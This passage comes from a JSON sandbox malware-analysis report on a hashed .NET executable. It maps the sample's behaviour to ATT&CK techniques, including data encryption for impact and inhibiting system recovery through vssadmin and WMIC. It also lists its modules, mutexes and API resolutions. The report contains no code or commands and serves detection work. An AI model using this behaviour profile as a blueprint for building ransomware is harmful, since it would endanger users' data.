"attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 2}, {"tactic": "Impact", "technique": "Inhibit System Recovery", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490", "malicious_identifiers_count": 4}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; File: \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63050000\n \"svchost.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 628A0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74890000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74890000\n \"WMIC.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74890000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValue\" in \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" called \"CreateDirectoryW\" (UID: 00000000-00005860)\n \"svchost.exe\" called \"CreateDirectoryW\" (UID: 00000000-00004160)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"svchost.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserName (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentThread (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DuplicateHandle (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetKeyboardLayout (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformationW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EnumProcesses (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EnumProcessesW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FormatMessage (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegSetValueEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OleGetClipboard (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoGetObjectContext (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetConsoleCtrlHandler (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetConsoleCtrlHandlerW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetModuleHandle (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetClassInfo (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetClassInfoW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegisterClass (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegisterClassW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateWindowEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DefWindowProc (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter MsgWaitForMultipleObjectsEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter PeekMessage (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter PeekMessageW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TranslateMessageW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DispatchMessage (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DispatchMessageW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter PostMessage (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter PostMessageW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GlobalLock (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GlobalUnlock (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GlobalFree (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenSCManager (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetServiceKeyName (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetServiceKeyNameW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter I_RpcSNCHOption (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetServiceDisplayName (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetServiceDisplayNameW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenService (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EnumDependentServices (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter EnumDependentServicesW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandleW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ControlService (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ControlServiceW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLogicalDrives (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectory (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FindFirstFile (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FindNextFile (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationThread (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateWaitableTimerExW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetWaitableTimerEx (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileAttributes (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CryptEncrypt (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DeleteFile (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DeleteFileW (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLongPathName (UID: 00000000-00004160)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLongPathNameW (UID: 00000000-00004160)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003904)\n \"vssadmin.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003904)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003644)\n \"WMIC.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003644)\n \"WMIC.exe\" called 